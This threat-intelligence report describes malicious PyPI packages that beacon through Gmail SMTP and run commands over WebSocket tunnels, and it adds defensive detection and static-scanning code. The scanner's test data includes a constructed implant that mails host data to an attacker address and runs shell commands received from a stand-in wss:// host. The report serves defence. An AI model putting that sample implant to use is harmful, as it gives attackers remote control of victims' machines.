Full Report
Seven malicious PyPI packages were found using Gmail's SMTP servers and WebSockets for data exfiltration and remote command execution. [...]
Analysis Summary
# Tool/Technique: Malicious PyPI Packages (Gmail Abuse/WebSocket Tunneling)
## Overview
This refers to a set of malicious packages distributed via the Python Package Index (PyPI) designed to establish covert, bidirectional remote access tunnels to compromised systems after initial reconnaissance via Gmail abuse.
## Technical Details
- Type: Malware/Supply Chain Attack
- Platform: Systems running Python environments that install the packages (likely Linux/Windows/macOS development environments).
- Capabilities: Covert command and control (C2), remote access via WebSocket tunneling, reconnaissance, data exfiltration (email/credentials).
- First Seen: Not explicitly stated for the PyPI packages, but the underlying techniques leveraging trusted services (Gmail) are observed in recent campaigns.
## MITRE ATT&CK Mapping
This attack involves multiple stages of adversary behavior:
- **TA0001 - Initial Access (via Supply Chain)**
- T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain (the malicious packages are installed from PyPI as ordinary dependencies).
- **TA0011 - Command and Control**
- T1071.003 - Application Layer Protocol: Mail Protocols (authenticated SMTP to `smtp.gmail.com` for the initial signaling email).
- T1071.001 - Application Layer Protocol: Web Protocols (WebSocket over TLS for the bidirectional C2 tunnel).
- T1102 - Web Service (routing the first stage through Gmail, a legitimate and widely allowed service, so the traffic blends with normal outbound mail).
- **TA0010 - Exfiltration**
- T1048 - Exfiltration Over Alternative Protocol (host reconnaissance data sent out through Gmail SMTP rather than over the C2 channel).
- **TA0005 - Defense Evasion**
- No separate obfuscation technique is described in the context; the evasion relies on blending into trusted infrastructure (T1102, above) rather than on obfuscated package code.
## Functionality
### Core Capabilities
- **Reconnaissance via Gmail Abuse:** The malware uses Gmail credentials hardcoded in the package to authenticate to `smtp.gmail.com` and email initial reconnaissance data about the host to the attacker. Because the destination is a legitimate, widely allowed service reached over an encrypted SMTP session, the beacon is unlikely to be blocked by egress filtering or flagged by EDR on the destination alone.
- **Persistent C2 Tunneling:** After the signaling email, the implant connects to a remote server over **WebSocket over TLS** (`wss://`). This gives the attacker an encrypted, bidirectional tunnel into the host.
### Advanced Features
- **Bidirectional Tunneling Control:** A `Client` class in the implant forwards traffic from the remote (attacker) end of the tunnel to the local (compromised) system, so the attacker can reach services on the host and on the network behind it.
- **Versatile Remote Access:** Through the tunnel the attacker can carry out a range of actions on the host, including:
- Internal admin panel and API access.
- File transfer.
- Shell command execution.
- Credentials harvesting.
- Lateral movement assistance.
- Email exfiltration.
## Indicators of Compromise
- File Hashes: [Not provided in the context]
- File Names: [Not provided in the context, depends on the specific package name]
- Registry Keys: [Not provided in the context]
- Network Indicators:
- Authenticated SMTP sessions to `smtp.gmail.com` (TCP 465 or 587) initiated by a Python process, using credentials embedded in the package rather than an account belonging to a user of the host.
- WebSocket over TLS (`wss://`) connections to attacker-controlled servers (C2 infrastructure); the C2 hostnames/IPs are not provided in the context.
- Behavioral Indicators:
- Installation of unrecognized Python packages from PyPI.
- Long-lived outbound WebSocket connections from a Python process that is not part of an established application flow.
- Outbound email sent via Gmail SMTP with credentials that do not belong to any user of the host.
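The two network indicators above are individually noisy (developers email reports from scripts, and plenty of tooling opens TLS connections), but their sequence from one interpreter process is distinctive: a Python process authenticates to Gmail SMTP and shortly afterwards opens a long-lived TLS connection to a host that is not a known package index. The following detector, added here as an illustration and not taken from the report, correlates exactly that pattern over constructed connection-tracking events (an assumed schema of open/close records carrying the process image, as one would get by joining flow logs to process telemetry). The allow-list, the 10-minute tunnel threshold and all sample events are assumptions for the example.

```python
"""Correlate per-process connection events for the Gmail-signal-then-tunnel pattern.

Added, illustrative detector. The event schema (open/close records with a process
image) and SAMPLE_EVENTS are constructed for this example; they are not logs
from the original report.
"""
from collections import defaultdict
from datetime import datetime, timedelta

GMAIL_SMTP_PORTS = {465, 587}
# Assumed allow-list of hosts a Python process is expected to talk to on 443.
DEFAULT_ALLOWLIST = frozenset({"pypi.org", "files.pythonhosted.org"})

# Constructed sample: one compromised interpreter (pid 4242), one pip run (5150),
# a mail client (6000) and a legitimate report-mailing script (7000).
SAMPLE_EVENTS = [
    {"ts": "2025-05-01T10:00:01", "pid": 4242, "image": "/usr/bin/python3",
     "dst_host": "smtp.gmail.com", "dst_port": 587, "state": "open"},
    {"ts": "2025-05-01T10:00:02", "pid": 4242, "image": "/usr/bin/python3",
     "dst_host": "smtp.gmail.com", "dst_port": 587, "state": "close"},
    {"ts": "2025-05-01T10:00:03", "pid": 4242, "image": "/usr/bin/python3",
     "dst_host": "203.0.113.10", "dst_port": 443, "state": "open"},
    {"ts": "2025-05-01T10:45:03", "pid": 4242, "image": "/usr/bin/python3",
     "dst_host": "203.0.113.10", "dst_port": 443, "state": "close"},
    {"ts": "2025-05-01T10:01:00", "pid": 5150, "image": "/usr/bin/python3",
     "dst_host": "pypi.org", "dst_port": 443, "state": "open"},
    {"ts": "2025-05-01T10:01:05", "pid": 5150, "image": "/usr/bin/python3",
     "dst_host": "pypi.org", "dst_port": 443, "state": "close"},
    {"ts": "2025-05-01T10:02:00", "pid": 6000, "image": "/usr/bin/thunderbird",
     "dst_host": "smtp.gmail.com", "dst_port": 587, "state": "open"},
    {"ts": "2025-05-01T10:03:00", "pid": 7000, "image": "/usr/bin/python3",
     "dst_host": "smtp.gmail.com", "dst_port": 587, "state": "open"},
    {"ts": "2025-05-01T10:03:02", "pid": 7000, "image": "/usr/bin/python3",
     "dst_host": "smtp.gmail.com", "dst_port": 587, "state": "close"},
]


def _is_python(image):
    """True if the process image basename looks like a Python interpreter."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower().startswith("python")


def correlate(events, allowlist=DEFAULT_ALLOWLIST, min_tunnel_seconds=600):
    """Return one alert per Python process that (1) authenticated to Gmail SMTP and
    (2) afterwards held a TLS connection to a non-allow-listed host for at least
    min_tunnel_seconds, or that is still open (no close record seen)."""
    min_tunnel = timedelta(seconds=min_tunnel_seconds)
    by_pid = defaultdict(list)
    for e in events:
        by_pid[e["pid"]].append(e)

    alerts = []
    for pid, evs in by_pid.items():
        evs.sort(key=lambda e: e["ts"])  # ISO-8601 strings sort chronologically
        if not _is_python(evs[0]["image"]):
            continue
        smtp_open = next((e for e in evs if e["state"] == "open"
                          and e["dst_host"] == "smtp.gmail.com"
                          and e["dst_port"] in GMAIL_SMTP_PORTS), None)
        if smtp_open is None:
            continue  # no Gmail signal: an ordinary TLS session is not enough
        t_smtp = datetime.fromisoformat(smtp_open["ts"])
        for e in evs:
            if e["state"] != "open" or e["dst_port"] != 443 or e["dst_host"] in allowlist:
                continue
            t_open = datetime.fromisoformat(e["ts"])
            if t_open < t_smtp:
                continue  # tunnel must follow the signaling email
            close = next((c for c in evs if c["state"] == "close"
                          and c["dst_host"] == e["dst_host"]
                          and datetime.fromisoformat(c["ts"]) > t_open), None)
            duration = datetime.fromisoformat(close["ts"]) - t_open if close else None
            if duration is None or duration >= min_tunnel:
                alerts.append({"pid": pid, "image": e["image"],
                               "signal_at": smtp_open["ts"],
                               "tunnel_host": e["dst_host"],
                               "tunnel_open_at": e["ts"],
                               "tunnel_duration": duration})
    return alerts


if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(a)
```

Only pid 4242 fires: the pip process never touched Gmail, the mail client is not an interpreter, and the report-mailing script sent email but opened no tunnel. Raising the threshold above the sample tunnel's 45 minutes silences the alert, which is the knob to tune against legitimate long-lived connections in a given environment.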
## Associated Threat Actors
- [Not named in the context for these PyPI packages. Abuse of trusted services such as Gmail for signaling is common to both criminal and espionage tooling, so it does not by itself point to a specific actor.]
## Detection Methods
- Signature-based detection: [Requires signatures for specific malicious package hashes/names, which are transient.]
- Behavioral detection: Monitoring for Python processes initiating persistent WebSocket connections or unusual authenticated outbound SMTP traffic (especially using embedded credentials).
- YARA rules: [Not provided in the context]
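Because names and hashes go stale, the durable signal is in the source itself: the capabilities described under Functionality (a hardcoded login to `smtp.gmail.com`, a `wss://` client, shell command execution) are visible in the package's Python before anything runs. The scanner below is an added example, not code from the report or from the packages it describes; it walks the AST of a module and flags those traits, and `scan_tree` applies it to every `.py` under a directory such as a fresh virtualenv's `site-packages`. `SAMPLE_MODULE` is a constructed stand-in whose addresses, account names and `websocket` dependency are placeholders, and the three-trait threshold in `verdict` is an assumption.

```python
"""Static scan for the traits described above, run over a constructed sample.

Added example; SAMPLE_MODULE and BENIGN_MODULE are constructed for illustration
and are not the code of the reported packages.
"""
import ast
from pathlib import Path

SAMPLE_MODULE = '''
import smtplib, socket, subprocess
import websocket  # placeholder dependency name for the constructed sample

def beacon():
    s = smtplib.SMTP_SSL("smtp.gmail.com", 465)
    s.login("dropbox.account@gmail.com", "hunter2-app-password")
    s.sendmail("dropbox.account@gmail.com", "attacker@gmail.com", socket.gethostname())

def tunnel():
    ws = websocket.create_connection("wss://203.0.113.10/ws")
    while True:
        cmd = ws.recv()
        ws.send(subprocess.check_output(cmd, shell=True))
'''

BENIGN_MODULE = '''
import json
def load(path):
    with open(path) as f:
        return json.load(f)
'''

SHELL_MODULES = {"os", "subprocess"}
SHELL_CALLS = {"system", "popen", "check_output", "run", "call", "Popen"}


def _call_name(node):
    """Render a Call's callee as 'base.attr', 'attr' or 'name'; '' if not simple."""
    f = node.func
    if isinstance(f, ast.Attribute):
        base = f.value.id if isinstance(f.value, ast.Name) else ""
        return f"{base}.{f.attr}" if base else f.attr
    if isinstance(f, ast.Name):
        return f.id
    return ""


def scan_source(source):
    """Return [(finding_kind, line_number), ...] sorted by line."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            value = node.value
            if value == "smtp.gmail.com":
                findings.append(("gmail_smtp_host", node.lineno))
            if value.startswith(("ws://", "wss://")):
                findings.append(("websocket_url", node.lineno))
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            attr = name.rsplit(".", 1)[-1]
            base = name.split(".")[0] if "." in name else ""
            # .login(<str literal>, <str literal>): credentials baked into the code
            if attr == "login" and len(node.args) >= 2 and all(
                isinstance(a, ast.Constant) and isinstance(a.value, str) for a in node.args[:2]
            ):
                findings.append(("hardcoded_login_credentials", node.lineno))
            if base in SHELL_MODULES and attr in SHELL_CALLS:
                findings.append(("shell_execution", node.lineno))
    return sorted(findings, key=lambda f: (f[1], f[0]))


def verdict(findings, threshold=3):
    """(suspicious?, sorted distinct finding kinds). Threshold is an assumed cut-off:
    one trait alone (e.g. a mail-sending helper) is common in benign code."""
    kinds = sorted({kind for kind, _ in findings})
    return len(kinds) >= threshold, kinds


def scan_tree(root):
    """Scan every .py under root; returns {relative_path: findings} for files with hits."""
    hits = {}
    root = Path(root)
    for path in root.rglob("*.py"):
        try:
            found = scan_source(path.read_text(encoding="utf-8", errors="replace"))
        except SyntaxError:
            continue  # not parseable as Python 3; inspect manually
        if found:
            hits[str(path.relative_to(root))] = found
    return hits


if __name__ == "__main__":
    print(scan_source(SAMPLE_MODULE))
    print(verdict(scan_source(SAMPLE_MODULE)))
```

Run `scan_tree` against a throwaway virtualenv right after `pip install` and before anything imports the package; the AST approach is robust to reformatting but not to code that builds the hostname or URL at runtime, so treat a clean result as "no obvious traits", not as a clearance.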
## Mitigation Strategies
- **Immediate Action:** Remove any recently installed suspicious PyPI packages, and treat every host where one of them ran as compromised: the implant hands the attacker a shell and file transfer, so removing the package does not close the intrusion.
- **Credential Rotation:** The hardcoded Gmail credentials belong to the attacker, not to the victim; what needs rotating is every secret the implant could reach on affected hosts (environment variables, API tokens, SSH keys, saved mail credentials), since the tunnel supports credential harvesting.
- **Supply Chain Security:** Use dependency scanning tools, maintain strict allow-lists for third-party libraries, pin dependencies to known hashes (`pip install --require-hashes`), and verify the reputation/authorship of packages installed from public repositories like PyPI.
- **Network Monitoring:** Monitor outbound traffic for non-standard use of legitimate services (e.g., unexpected WebSocket connections appearing outside established application flows, or unusual SMTP activity).
## Related Tools/Techniques
- **Crypto Stealer (Related npm package):** The package `crypto-encrypt-ts` (npm) used similar supply chain tactics to steal cryptocurrency wallet secrets and environment variables by masquerading as a standard library (`CryptoJS`).
- **Tunneling Malware:** Tools that utilize protocols like WebSocket or DNS for covert C2 communication.
- **Living off the Land (LotL) C2:** Techniques leveraging trusted infrastructure like Gmail or standard protocols (HTTPS/TLS) to evade security controls.